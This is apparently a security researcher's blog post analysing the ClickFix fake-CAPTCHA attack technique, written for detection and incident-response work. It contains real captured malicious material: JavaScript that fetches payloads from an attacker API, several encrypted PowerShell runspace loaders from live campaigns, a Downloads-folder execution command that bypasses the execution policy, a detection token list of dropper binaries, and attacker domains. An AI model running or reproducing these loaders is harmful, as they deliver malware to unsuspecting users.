ClickFix: The Gift That Keeps On Giving

Bert-Jan Pals included in Threat Hunting Detection Engineering Defender for Endpoint Defender XDR Incident Response SOC

2026-06-22 1994 words 10 minutes

Contents

In the beginning of June I presented the session ClickFix: The Gift That Keeps On Giving at OrangeCon. ClickFix emerged around 2024 and saw a 517% increase in 2025 as described by SANS, the effectiveness of this technique is something we will have to deal with for the upcomming years. Before diving into technical details, it’s important to understand why ClickFix is so effective. The attack exploits fundamental user behaviors and training:

We are trained to solve captcha challenges.
Wide range of legitimate captchas available.
We are used to follow instructions.
Non-technical audience lacks understanding of the impact of pasting a command.

This blog presents the findings and research conducted in preparation for the OrangeCon session. For the session around 3000 ClickFix payloads are investigated and multiple ClickFix platforms are reversed to give shed some light on the ongoing operations.

Interested in the full session? Watch the recording on YouTube

ClickFix 101

ClickFix is an initial access/dropper technique based on 3 steps as described in the flow by BitDefender:

Deception: The user is shown a fake verification (CAPTCHA) page that instructs them to follow steps to continue.
Clipboard Injection: Malicious JavaScript silently copies a command into the user’s clipboard.
Execution: The user pastes and runs the command, unknowingly executing malware that connects to the attacker’s infrastructure.

/images/ClickFixGift/ClickFix101.png — ClickFix Steps (Right part of image source: BitDefender)

Delivery Methods

ClickFix campaigns reach users through two distinct methods:

Social Engineering Approach

Threat actors craft email messages designed to appear urgent or legitimate to lure victims.
Recipients are directed to dedicated ClickFix infrastructure.
Can be targetted.

Browsing Based Infections

Users conducting routine search engine queries inadvertently land on malicious pages.
Compromised WordPress installations often serve as hosting platforms for ClickFix pages, vulnerable WordPress plugins are frequently exploited to inject malicious CAPTCHA overlays.
A broad shutgun approach that requires traffic on the compromised WordPress sites.

Execution Specializations

As ClickFix evolved, threat actors developed different execution methods as detection and prevention evolved. For this blog we only deep-dive into the Windows based methods, but know that MacOs ClickFix campaigns are also active. There are two distinct methods to identify Windows + Run and Windows + X.

/images/ClickFixGift/Methods.png — ClickFix Windows + R and Windows + X

Windows + Run (Run Dialog)

The original specialization emerged in 2024 and saw rapid adoption through 2025:

Triggered via Windows + R keyboard shortcut
User is prompted to paste a command into the Run dialog
Executes as a child process of explorer.exe
Process chain: explorer.exe → cmd.exe, powershell.exe or any other lolbin with an outbound connection

/images/ClickFixGift/WindowsRunProcMon.png — Windows + R Parent Child Relation

A newer specialization emerged in 2025 and rapidly gained adoption into 2026:

Triggered via Windows + X keyboard shortcut
Lures the victim into typing I or selecting Terminal
Opens the Windows Terminal application
PowerShell executes by default as the shell environment
Process chain: WindowsTerminal.exe → powershell.exe

The shift toward Windows Terminal execution complicates detection logic, as Windows Terminal operations appear more legitimate than direct Run dialog execution.

/images/ClickFixGift/WindowsXProcMon.png — Windows + X Parent Child Relation

Reseaching ClickFix Platforms

To understand the state of ClickFix in 2026 it was time to perform some research. I wanted to know the answers on the following questions:

How are payloads deliver to the clipboard?
What stage 2 loaders are used to deliver the payloads?
How have the obfuscation techniques evolved over the past two years?

The performed research is done using with reverse engineering ClickFix payloads and performing data analytics on the 1000s of ClickFix domains and payloads added to the ClickFix Hunter project.

JavaScript Obfuscation and Clipboard Injection

As any advanced reverse engineer does developer tools in the browser were used to identify how payloads were delivered to the clipboard. The screenshot indicates our assumption, a compromised wordpress site is hosting a fake captcha.

ClickFix pages use obfuscated JavaScript to:

Detect browser and operating system characteristics
Craft OS-specific payloads
Inject payloads into the user’s clipboard
Prompt users to paste and execute
Deliver payloads in the language of the visitor, platforms support 25 different languages.

/images/ClickFixGift/DifferentLanguage.png — ClickFix platform is supporting 25 different languages

CPaaS: Payload Delivery as a Platform

The JavaScript characteristics are not suprising and expected, but that is not all what is included in the script.One of the more notable findings in researching this ClickFix operation is the existence of structured Payload-as-a-Service (CPaaS) infrastructure. This is single payload that is loaded for each visitor, it is organized, API-driven, and designed for scalability.

/images/ClickFixGift/CPaaS.png — CPaaS: ClickFix Payload as a Service

Threat actors have implemented backend API endpoints that:

Accept requests for payloads
Use access tokens for authentication
Generate unique, obfuscated payloads dynamically
Return different obfuscation methods each time
Log metadata including timestamps and request parameters

The payload is dynamically collected in the function fetchPayload().

/images/ClickFixGift/FetchPayload.png — JavaScript Fetch Operation for Payload Retrieval

        
        
        
    
// cloudflare.js — ClickFix Cloudflare CAPTCHA module
// Loaded by JS loader from API server: ?a=js&mode=cloudflare
// Exports via window.__BW_MODE_RUN__

window.__BW_MODE_RUN__ = function(ctx) {
    // ctx contains: panelBaseUrl, apiBase, apiUrl, logUrl, tokenUrl, downloadUrl,
    //               mode, os, browser, country, storageKey, cfg, contractConfig

    // Fetch payload (PS command) from API server
    var currentPayload = '';
    var captchaMode = 1;
    function fetchPayload() {
        try {
            var url = ctx.downloadUrl || (ctx.apiBase + '/api/index.php?a=init');
            try {
                var _ps = new URLSearchParams(window.location.search);
                var _src = _ps.get('src') || window.location.hostname;
                if (url.indexOf('src=') === -1)
                    url += (url.indexOf('?') !== -1 ? '&' : '?') + 'src=' + encodeURIComponent(_src);
            } catch (ee) {}
            var xhr = new XMLHttpRequest();
            xhr.open('GET', url, true);
            xhr.onload = function() {
                if (xhr.status === 200) {
                    try {
                        var data = JSON.parse(xhr.responseText);
                        if (data.token)
                            currentPayload = data.token;
                        else if (data.payload)
                            currentPayload = data.payload;
                        else
                            currentPayload = xhr.responseText;
                        if (data.captcha_mode) {
                            console.log('[CF] captcha_mode from init:', data.captcha_mode);
                        }
                        if (data.captcha_mode === 2 && captchaMode !== 2) {
                            captchaMode = 2;
                            rerenderSteps();
                        }
                    } catch (e) {
                        if (xhr.responseText.length > 5)
                            currentPayload = xhr.responseText;
                    }
                    syncCfId();
                }
            }
            ;
            xhr.send();
        } catch (e) {}

        // Also try cfg payload
        if (ctx.cfg && ctx.cfg.payload) {
            currentPayload = ctx.cfg.payload;
            syncCfId();
        }
        if (ctx.cfg && ctx.cfg.captcha_mode === 2)
            captchaMode = 2;
    }

Research CPaaS API

If you do security research you often go on side-quests, this research also had one related to payloads. I did not expect to find a CPaaS infrastructure on a random clickfix campaign, but once I did it I needed answers. It was time to do a little bit of digging to undersand how it worked.

To understand what payloads are returned I requested 100 payloads from the CPaaS platform, a subset of the responses is added to this blog. These 100 payloads resulted in the following conclusions:

100 unique payloads observed (no payload reuse)
Multiple obfuscation techniques employed dynamically
Server-side deobfuscation always results in identical malicious code
PowerShell RunSpace for memory and obfuscation reasons

In this particular campaign the obfuscated payload is unique, but once the code is deobfuscated the payload is the same.

/images/ClickFixGift/CPaasResultsDeobfuscated.png — Deobfuscated Payloads

        
        
        
    
[
    {
        "index":  1,
        "timestamp":  "2026-05-14T13:53:21.2886856+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$record9m=[Convert]::FromBase64String(\u0027jFcGdKEaozRvCRFaOJ+aDH1YWl73BIcjiGdhjvrGeBU=\u0027);$record9m=[Convert]::FromBase64String(\u0027I1c58dS81nJ1bkLJc3XOGg==\u0027);$packet4k=[Convert]::FromBase64String(\u0027Sj0seqdHEUqapplbw9inaUNqWw4S8kv9pOS+tbUlyH/tqtk8pRz5YApFwJyG/hpkdIh+IjPmy+CeEcq26gjScStKoBH/8pQpAAkmzmncRRq3cHwdH1UU3ebDF65vdOfGcjux4nWTocZ+1XmAbleOiAaNQdWcopUAo5HElvBQCqnRQOdo/p0tYlKWUJfEtlEXDnqWLwP3/2mCtY+5TH0CGWkevsq+8tmVagIaUDStopIsf+7GMKywNaNJ7oU+0JbKBJYNvhaJzziaQYvp9DYxGArit57p3Dvn+6jezsdFRMu1ueXeV+053z9YC6nnDGSdHJAK2J5vif5e4YBDgAw2yLmwp++ksPLCUJPW7CI+jjtq8Hq+Y2IJJa4e8QUjgTwKrn1M7GWurTtAXp/YXIlmxgoPCMkgRXsuZIlruhzGmJ2V9boDGpoVEgLYZbxMOTiiUZCxtW0DGLcw6iY3JyNVGfuj81fZDuesCryxOLHffQ/yH2rTtBH0mHgBTYifEZZ8+ALVH6Id2qD9E971ehDI57A4DAvxw1WKRCG6PaWNAAec0Qpp59BQYqSJvs0MLulwSm3WVr09l1zEAC8dK1X1WYtG45tzZ/3VJwufRdyyTSl4t/WH8ZM9TZiQuPHHPKmhIoZec4bgc064jh0dvMNNs9ZdDSzk7ZIU6tk9Ne/lpoifF4QaUzi11IcG3elUXuGChQKqMspHNODSpOxVYHK8wyCkXOu2M6md3yvGjz4QOHCudUl0dIre/qeoErIEKleztkYmwWeOM5ZX4FAuEeTINSy3oCHkq31CBiNjNWl/r2YmOuQOseD7rTH8fQVwydSw5rmP6m7NyCTkAJM4umBKgSE1E/qvFg/pidGIj/XO77wzyMzTXp6eFxQ/314Jc9OZsBaqhxe5JtIJn7BnY4dwaSvHWDY4Siao9nr+DXm2rmdVp/7m9hMqon+vWJdRxhC/sL5pDOs+hpU1AinqnYOGhWP2c9aUH/d0LZFHgU2YIUS7ADsjivxuFFKHw9x2/ItCKBWrrjP6Lj/NAUdUS6Qgdg02U0WFzBkMcuwiTYxiPWdBvSZFb7imd4U1s/kC40uKnYO/+2tEDvpzSXC+sCNA0SzTdqMZSpi6EBAMOPd4PoonbpUxE38/6/arb5o9sJSW\u0027);$stream9m=[Security.Cryptography.Aes]::Create();$stream9m.Key=$record9m;$stream9m.IV=$record9m;$stream9m.Mode=\u0027CBC\u0027;$stream9m.Padding=\u0027PKCS7\u0027;$block0g=[Text.Encoding]::UTF8.GetString($stream9m.CreateDecryptor().TransformFinalBlock($packet4k,0,$packet4k.Length));$stream9m.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($block0g);$pp.Invoke();$rs.Close();exit"
    },
    {
        "index":  2,
        "timestamp":  "2026-05-14T13:53:27.3626484+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$content5e=[IO.MemoryStream]::new([Convert]::FromBase64String(\u0027jVNdb5swFP0rfkAlqCUpIVlCEZq6fmydujQqmfow7cHYl8aqsZm5SYuy/PddsixaN03aCzKccy7Hx8fe3NlHB00zd1CCAyMg83OlwaBuL6xBZVbgp1/ytkGo+jPAfg5urQTMrTL4iRv+CO7r2VkOYuUUtjQPrbA6ey15DS7aGkiz0E00TD08cG/u+nOOS4IubFUoA71fyJVZK2dNRb4IfQ94bbUE17F7/q0VXJ/XtVaCo7LmkiP3gxN/AVXtn/w9nOT33EhbXdNGZ7yCXhCkM3gOb4jHds/OIbtUDgRa17KwUzIPWXhtnYDvdysMZyutU6/MPlIQB7z3X3879vvwAn6QevYpO01L63qeooWnWKiRxSwkAQuNRUYM+nx8HGzQtZsbs7ZPED5AcQ/fVtCQoc9OMX+JWDdng0HBi7awpi9KOeC1Gigj4aVfL+u3PJP6CElssqngvEzGsZwmo8m0mPJJlERQxMNhMhZRNOFxdFqMYy6S03EiR1y+SXgEcTIBERdDOTpqnMiEtitZau7gqLISfnv3WUjxdJtlXkn+GnjHGyXm3DXKPKaq7C3I+D6xMth0GURb0A1scuQOw1wD1Cyk0lgjGzbcbulYxfKfaDdyl9XrwcEGXhRu058yqp6gmtMBkrE9hYUPFJB9zrElsx+UlGDSLuZ7qOwa9nW4VQiO64Nm1wAWXjln3bno+sb+vDB7w9v0Bw==\u0027));$response3f=[IO.MemoryStream]::new();[IO.Compression.DeflateStream]::new($content5e,[IO.Compression.CompressionMode]::Decompress).CopyTo($response3f);$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript([Text.Encoding]::UTF8.GetString($response3f.ToArray()));$pp.Invoke();$rs.Close();exit"
    },
    ...
        {
        "index":  98,
        "timestamp":  "2026-05-14T14:04:16.8138217+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$result3f=[Convert]::FromBase64String(\u0027Ktz7+VB4Dgh+S56QnsQ9b+yTEZcDEmzCgWdqN5NP1pg=\u0027);$chunk9m=[Convert]::FromBase64String(\u0027yzRZXgDE5aS/KI7N/mBfuQ==\u0027);$stream2b=[Convert]::FromBase64String(\u0027/bFMPD/YP0D26aQPJnYV8P0QL5S8pn4WHRmqijcKp7cu2w5nU59xIRkCp+xhWyePp1XY7zgh99ONxTaB7riYIsIGQNlif6k6CnOfX+QYV3mPCnGUV3+2tqepvx8cAzbBQcakOtFOUe6qOh/O/2uIvneoxv+T7swbXdOXqgFJYFeYxPGRXiQ7lEhr15FNXSc7sL85Fq+Pji3Nbrg9DP/FCi0eTaKECGBDxxEaTlbTGESGrqUO+IMbrD9MtiYmGJksbKfohH5Pa9+w9voMW/Ou9kC5KIdId/sM7y+qPVWvKOS0smI0FCvr1mqyV/unMChYe0/npvXkFMoPdqd8ahS1zWokuYv6cc0vBvSLKh/jyNIwn/++3aVbdJDVUZxwQd40PeXrHTWeEXNM3rqZBx4oBwwGBqMaWFd1dfLqOds5KllumpzG3ZgVO2++h4AcjCC/j4+syH8J+krOuCtol8wh99XlhDU9Oz4z4WfyCBdqaN0FT9Vci20Wp2XLS2/rHGtZNajI9k+bisB4JOKZhPU+ApdlIDAQp85GiwVe2jacP0SQ5vqNgru1q6IOgEMyCRAKWLM5+1GVva/E/Yc/DfbCl52pvFyxVkBlR7bbywh5WuPFTUAJIaI1ztjJknQIh+Nv/WvpFFn7fRixIgC+L0158+6wXh6YAVhtS566wrgZkRvvZlA4GBOEFGpEtY9bIktOJ0FV4+3gjPpiPmKp0ENuzMlgNIaj8mkK3xkZfaftAs1jgLAq5a9+N92pj9NicsDgwvPQRdo6/Ot4qIQFVL8UdcAt6tf4L9SCZYB6+S4PM8l/K1Uq4bmSrDP4MKC8Vlb+oNjuQfAGJdrvfXXQyy4vJw8gSK/QZ+j+DxoWYbDrWbARIOIBO8eCGjuK1mtm3HsueyBqdD/ckcnjn3wxyrj3yS/oWR2tCioFceaYA8nKaDY1v+0bLe2bBmsMTkYzGamjruI9lueAZTlpSLPmQ88TLu70zYcLHAlcdBcgNXFKnix2T6Zv7065bIXwpDlqFkWa+i7x6eTi+uqiysZbxNIhtJpLrRgPjS3OKleta8SoxVgz0mslu+JS8yRIOSx6/2siNGZbFymFMslWuSDS1FNx7MsXUeo8ZRGvzSaEYajjjg574M1QbsW3wqMmSXHF3rQX\u0027);$content9m=[Security.Cryptography.Aes]::Create();$content9m.Key=$result3f;$content9m.IV=$chunk9m;$content9m.Mode=\u0027CBC\u0027;$content9m.Padding=\u0027PKCS7\u0027;$result5e=[Text.Encoding]::UTF8.GetString($content9m.CreateDecryptor().TransformFinalBlock($stream2b,0,$stream2b.Length));$content9m.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($result5e);$pp.Invoke();$rs.Close();exit"
    },
    {
        "index":  99,
        "timestamp":  "2026-05-14T14:04:19.8957583+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$chunk7x=[Convert]::FromBase64String(\u0027lVdZkhRmBSHuK0qJ2XyABBPS4rqZzRShA+H5E7DDIP8=\u0027);$segment4k=[Convert]::FromBase64String(\u0027I7LvI/Lh7Jb0o8r3DI26Ug==\u0027);$stream5e=[Convert]::FromBase64String(\u0027VbYryylvpDAta6p0G04cnjZnrOZs1uRAV/nalkY06oeM5JGZbtbOwOMyuVGj/vLatFsjNo9RdPnCkw7X1NVrd0zCAAb++V5x4Y6Sbv5SNM3R+/kal1y3R3jvvOMG7oHWiKIyA+xujZ4sGX7T7kV+u6dNmf7wN9VwnNh/h/u+Re4hgahweaJ9YTr1ux/11krvys74Rh5enVxdY3crfTK7vFZ/MCSIwAGFqZ+x9BYk3cCBmbu2zKbht0DVNMVwsQf5kKsGbjKTUGfIHfuN6qfj2alinBRpmU58F/YG04jV7T0IiLLmTtjFiK25HvPFl9mHlP3443XoD3TnxcvibDV8wHllHMP9Gggn/dvmMmgaZ8S8HeBg3kF+MKyLix+BSe8XTkcAS3mx54ci8xzyXTpCP2GuKWdtQYpruReApUztkhDViDaEZArS8+BPzpN2XWPbAtpR54V9Avkfy0/eY9o3oHmXPopd0zddMfc08iacOoKfhS7mkiyp2nZbUAjPCVf2GhtOaBzOPlf9mg+SC6PIfVkIVl/4zAj0xPJmTxXH8DevqjfyUIuFKRdz/U2AdN7EuvOTxLnFU0BE4RP05/lXCipJMuWNIAobunt8EwQl+OTgb4dXkpFbrFTbZ59PdIDm6Y+4RCDixtz+bEatPuBhbUpezO6MCVxkeCU7xJzIIQiQQQWtP5ipepOi2U9K6Ikhr7ShwGoZFIOxYBVYkZWE8HMGygBCDznA41Ydu4FWeIkcOiYhntwFVTjGWHHjv04jeDQbgtqfVtET19ikrNAKOWnmeFfFu4PXOfGClXhQ0Z9UiDdraKnB2fNz5WlfKSDMRLgFoW9JSDP5Xe4lnsFoUisDv4r/M6FzfAltNuHqOAle11mkRuWwN1a/1HFuzaYRfxusQAu+v6u7nP4YE15l23MxWApw++uda3RgkU4S+kEtdSovnvbDn0W3vYOZwHt3Zf+3M4XV3GmwEo7bw40owZExbUhrzR4GQzYzAUOctYoAuBFx+9THKfJhQ1v+FfW0FZQkgFc3W6q8S+cK/Q825J65W2CgWpnRDzQtZOZZbfRx3fkD4faETXxnyVWTvkkjKYc028NzjpGWmjmvIrgQrNGmiuGbbfUihN0KAzOZhuyvVYNppoMCD6Nu0fjnydFs\u0027);$buffer5e=[Security.Cryptography.Aes]::Create();$buffer5e.Key=$chunk7x;$buffer5e.IV=$segment4k;$buffer5e.Mode=\u0027CBC\u0027;$buffer5e.Padding=\u0027PKCS7\u0027;$stream8d=[Text.Encoding]::UTF8.GetString($buffer5e.CreateDecryptor().TransformFinalBlock($stream5e,0,$stream5e.Length));$buffer5e.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($stream8d);$pp.Invoke();$rs.Close();exit"
    },
    {
        "index":  100,
        "timestamp":  "2026-05-14T14:04:22.0036431+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$data4k=[Security.Cryptography.TripleDES]::Create();$data4k.Key=[Convert]::FromBase64String(\u0027KF0oKBfK7z4Uit01oqzmmY7U8o+v2kc2\u0027);$data4k.IV=[Convert]::FromBase64String(\u00273cSSMwvFufk=\u0027);$data9m=[Convert]::FromBase64String(\u0027YJFgOG3YdqmRbA3NCp5m4RVXZl20vAGo2jafyBf8mDiIM+IrVW4WumUVw6EZ6R8uKUDQS7H2pWy8zczY2f1p+28wBKgJFpYz2HoFb95wmL9EOVO9+qyQ3HDTv/Em+K6GJE9osD1HxE00QGAfjtDCV5BEsYQazjmwQb0xXSmwz798bdhyYCN2LUEcFoNt3HjF6oxy5ZmrTPZ2+iZ3rNpkNDhBmGdxo6Ea7LkDzOiqvrKgzqHWLVxbwqf/rgTD5W/1hEbSYvW6iccLVOOdfbIK4AZ5wRQLOa2KJxtwcj0tewZPqw06SVZgatJf/EVQQrh7b9GpNapdN8KkdT2nmJZLxbprtw5CBugO2EZmQQAOmB/43ZPsbKyy0JlAXW38hP18pZFnri5Mj+m5hGMcr61RwEVYXuiY4FFNodZ43OZT4+/a2iI6Y9b8U1qMtEbxf1Cl8DQFvUkf6Z+I9wg96NMrl5sTrh7thaXHTqnf5ZDVacqNMr2FxvNts+KsZ/fhpmdr+UykiNXTS7MIBRdoB7At/Wiz91Z7zrTliJEsN8pG2PSbyjwn7i+vi7Z53P+/Rqe+n1EA3JTOUJrRfKv8xnWLnv2YYZmeSSOVmE0kqa5s0V6WszdgMDluVmGNdrLr2/M0L1HbPdlGx/g6s3c3LK4Xvbz/6xkrmDMod/i3eP1ovxVqc4mzXVpZjuHQkvL9akGYSuZcoBuLPsftq3bnLJoXETb8e9vsfI3CUpqQF718AdvfxQ8Omx9m9/SAgUsSe2cMjF0okyXml1xVQ9a5zsbhxDIc8Xh0nJpH9SLT4Bwm8svFUyba1a3CnKp+gzSf45RMWXaLyUuKW1K428H7mj4hN0XdUWU5xqs/X5S0p1JyujSUcZwZ8AONVsekgMD8dIm6DyItv52WZOsZ6WJfbhAb4Oar+RGjkN8RcYBbhHWO4He6/RbIpZq+biIlslF071GwHNaP40XzyOsFMYoMQrJGZAKvoEK4tGKFYEtv12wyj7fcSu5crfyIG83lgh8YxIZU6Pj2UX46x78frBAdtqEdzTvtUJcvhBDcJnR7e2yhv9H3s4KY23I1iWWtpVQPDyIb3nqII1HH0b699sEoeupetFTpftHJFFZ5rX/JQwNdYzWHHs5If7s9rI1SAvKqIJ2e\u0027);$result0g=[Text.Encoding]::UTF8.GetString($data4k.CreateDecryptor().TransformFinalBlock($data9m,0,$data9m.Length));$data4k.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($result0g);$pp.Invoke();$rs.Close();exit"
    }
]

Payload Characteristics: Obfuscation Techniques

Analysis of collected payloads revealed consistent patterns in obfuscation strategies:

Obfuscation Methods Observed

Base64 encoding — Primary obfuscation layer
AES encryption — Symmetric encryption with embedded keys
TripleDES encryption — Alternative symmetric encryption
Rijndael encryption — Advanced symmetric encryption variants
Deflate compression — Data compression combined with encryption

PowerShell RunSpace Execution

A critical finding: all payloads use PowerShell runspaces for execution.

        
        
        
    
$rs = [runspacefactory]::CreateRunspace()
$rs.Open()
$pp = $rs.CreatePipeline()
$pp.Commands.AddScript($decodedPayload)
$pp.Invoke()
$rs.Close()

Why runspaces are used:

Executes scripts in-memory without spawning powershell.exe child processes
Bypasses many process-based detections
Avoids AMSI (Antimalware Scan Interface) inspection in some contexts
Difficult to detect with traditional command-line analysis

This indicates threat actor awareness of modern defensive capabilities and deliberate evasion of process-level detections.

Stage 2 Loaders: Living off the Land

After initial execution, ClickFix payloads employ Living-off-the-Land Binaries (LOLBins) to download and execute secondary stages.

LOLBin Usage Statistics

Analysis of 3,000 ClickFix payloads from the ClickFix Hunter project revealed:

LOLBin	Count	Percentage
PowerShell	1,170	39.0%
cmd	1,169	38.9%
msiexec	1,019	33.9%
curl	268	8.9%
net	183	6.1%
mshta	124	4.1%
AppV Sync (syncappvpublishingserver.vbs)	44	1.5%
wscript	37	1.2%
ssh	8	0.3%
rundll32	4	0.1%
regsvr32	2	0.1%
bitsadmin	1	0.0%
wmic	1	0.0%

/images/ClickFixGift/Results.png — Stage 2 Loaders Used in ClickFix Campaigns

Key observations:

PowerShell and cmd dominate — Combined, they account for ~78% of payloads
Multi-method payloads — Payloads often include fallback LOLBins
msiexec prevalence — Used for MSI package download and installation
curl popularity — Direct HTTP download method for secondary payloads

The prevalence of PowerShell and cmd reflects their universal availability and powerful scripting capabilities.

Technical DeepDive Payload Analysis

Using the Clickfix hunter project

ClickFix Hunter Project

Using the data of the ClickFix Hunter project clickfix.carsonww.com ~3000 entries

Downloaded 3000 entries, put them in ADX to analyze them with KQL

The following KQL query identifies LOLBin execution patterns typical of ClickFix:

        
        
        
    
let dropper_tokens = dynamic([
    "powershell", "powershell.exe", "pwsh", "pwsh.exe", "iwr", "iex"
    "cmd", "cmd.exe",
    "msiexec", "msiexec.exe",
    "curl", "curl.exe",
    "wget", "wget.exe",
    "rundll32", "rundll32.exe",
    "regsvr32", "regsvr32.exe",
    "wscript", "wscript.exe",
    "cscript", "cscript.exe",
    "schtasks", "schtasks.exe",
    "bitsadmin", "bitsadmin.exe",
    "mshta", "mshta.exe",
    "certutil", "certutil.exe",
    "wmic", "wmic.exe",
    "net", "net.exe",
    "ssh", "ssh.exe",
    "syncappvpublishingserver.vbs"
]);
OrangeCon_ClickFix
| extend Commandline = tolower(commandline)
| extend TargetOS = case(
    Commandline has @"/bin/bash", "MacOS",
    "Windows"
)
| extend Parsedcommandline = parse_command_line(Commandline, "windows")
| extend DropperPrograms = set_intersect(Parsedcommandline, dropper_tokens)
| where TargetOS == "Windows"
| project-away commandline
| extend DropperPrograms = array_concat(DropperPrograms, pack_array(
    iff(Commandline has "iex", "iex", ""),
    iff(Commandline has "cmd", "cmd", ""),
    iff(Commandline has "bitsadmin", "bitsadmin", ""),
    iff(Commandline has "curl", "curl", ""),
    iff(Commandline has "syncappvpublishingserver.vbs", "syncappvpublishingserver.vbs", "")))
| mv-expand DropperPrograms
| where isnotempty(DropperPrograms)
| summarize count() by tostring(DropperPrograms)
| extend Matches = dynamic([])
| extend NormMatches = dynamic([])
| extend NormMatches = iff(DropperPrograms has_any ("powershell", "powershell.exe", "iex", "invoke-expression", "iwr", "invoke-webrequest"),
                           array_concat(NormMatches, dynamic(["powershell"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has_any ("cmd", "cmd.exe"),
                           array_concat(NormMatches, dynamic(["cmd"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has "bitsadmin",
                           array_concat(NormMatches, dynamic(["bitsadmin"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has_any ("curl", "curl.exe"),
                           array_concat(NormMatches, dynamic(["curl"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has "syncappvpublishingserver.vbs",
                           array_concat(NormMatches, dynamic(["appv_sync"])), NormMatches)
| extend Final = iff(array_length(NormMatches) > 0, NormMatches[0], DropperPrograms)
| summarize Total = sum(count_) by Stage2Loaders = Final
| sort by Total

Results

LOLBINs are used in all payload deliver methods for windows

powershell 1,170 cmd 1,169 msiexec 1,019 curl 268 net 183 mshta 124 appv_sync 44 wscript 37 ssh 8 rundll32.exe 4 regsvr32 2 msiexec.exe 2 bitsadmin 1 wmic 1

The game continues: New Payload Methods Spawn

Fake Captcha
Download file to downloads folder
silent copy to clipboard
Execute clipboard pointing to file in downloads folder, goes around amsi as the text is not malicious

        
powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" #   "*  I am not a robot reCAPTCHA Verification ID:7947  *"

/images/ClickFixGift/DownloadsFolderMethod.png — New delivery technique using Downloads folder

Indicators of compromise

Identified API servers, there ar way more out there Comicstar[.]lat Babybon[.]cfd merkantalolol[.]asia

MITRE ATT&CK Alignment

ClickFix directly maps to T1204.004: User Execution: Malicious Copy and Paste, a technique that was formally added to the MITRE ATT&CK framework specifically because of attacks like this one. The technique acknowledges that user-driven execution—particularly copy-and-paste operations—has become a significant attack vector.

Conclusion

ClickFix is here to stay! The never ending game, Attack vs Defend, will continue Evolving to stay ahead of the detection & prevention Windows + X is more difficult to detect and prevent than Windows + R

Notes to put somewhere in the blog:

T1204.004: User Execution: Malicious Copy and Paste -> https://attack.mitre.org/techniques/T1204/004/ has been created because of this “Legitimate WordPress websites are being abused to host malicious iframes or injected scripts that profile visitors based on the User-Agent to deliver OS-specific malware. Wordpress sites are often abused to deliver the fake captha, due to the plugin vulnerabilities